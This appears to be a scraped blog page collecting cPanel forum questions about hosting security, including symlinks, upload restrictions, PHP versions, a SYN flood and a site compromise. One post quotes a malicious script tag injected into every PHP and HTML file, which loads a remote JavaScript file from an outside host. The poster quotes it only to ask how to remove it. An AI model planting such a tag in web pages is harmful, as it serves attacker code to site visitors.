What do I need to enable in cpanel to prevent users from creating symlinks to files they don't own?
symlinks to files not owned by the user
[Cpanel Blog] Add new User or what May,2012
Friday, 06 July 2012
[Cpanel Blog] symlinks to files not owned by the user July,2012
Posted by Bimo Hery Prabowo at 01.32 0 comments
Wednesday, 04 July 2012
[Cpanel Blog] How to set retraction on uploading file type or extensions? July,2012
Hi,
I want to limit uploads so that only files with approved extensions such as ".gif", ".jpeg", ".doc", etc. are allowed to be uploaded to the web server. This is vitally important for my server's security, since the web server might attempt to execute or specially process files with extensions like ".php", ".cgi", etc.
Can anybody advise how and where I can set / configure a restriction on file uploads according to the logic below:
# Deny All File extension
# Except : .gif , .jpg , .pdf , .png.
Any help is highly appreciated.
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012
Posted by Bimo Hery Prabowo at 01.32 0 comments
Saturday, 30 June 2012
[Cpanel Blog] disable special php.ini features with suexec June,2012
Hi,
We are using suexec in order to provide each customer with their own php.ini; is there any possibility to prevent the customers from setting safe_mode to off in their php.ini?
Kind regards,
Christian
Cpanel Blog Installing a UCC SSL Cert May,2012
Posted by Bimo Hery Prabowo at 13.32 0 comments
[Cpanel Blog] php 5.2.17 security backports question June,2012
Hello,
I run the default Apache (2.2.22) and PHP (5.2.17) installation, installed using EasyApache through cPanel/WHM.
Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).
Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?
We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.
Any info or tips are greatly appreciated.
Thank you!
secunia dot com/advisories/49731/ (CVEs listed here)
secunia dot com/advisories/49014/ (CVEs listed here)
Cpanel Blog Strange email with attachment from "cpanel" May,2012
Posted by Bimo Hery Prabowo at 07.32 0 comments
[Cpanel Blog] Using PHP to add a custom security policy June,2012
Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
[Cpanel Blog] Share your Mod Security configuration May,2012
Posted by Bimo Hery Prabowo at 01.32 0 comments
Thursday, 28 June 2012
[Cpanel Blog] security problem, php and html files vulnerability June,2012
For 2 days I have had a problem with some accounts on some of my VPSes with cPanel.
I must find and replace a specific string in all accounts. I find this in all PHP and HTML files in some FTP roots:
<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>
in the first line of every file, and I must run a combination of find and sed commands to remove it.
Cpanel Blog can't access our website May,2012
Posted by Bimo Hery Prabowo at 07.32 0 comments
[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012
I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.
I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.
I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.
Can this be easily accomplished?
Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.
By the way, they are hitting port 443 rather than port 80 for some reason.
Thanks for any ideas here!
[Cpanel Blog] Security bug in cPanel login May,2012
Posted by Bimo Hery Prabowo at 01.32 0 comments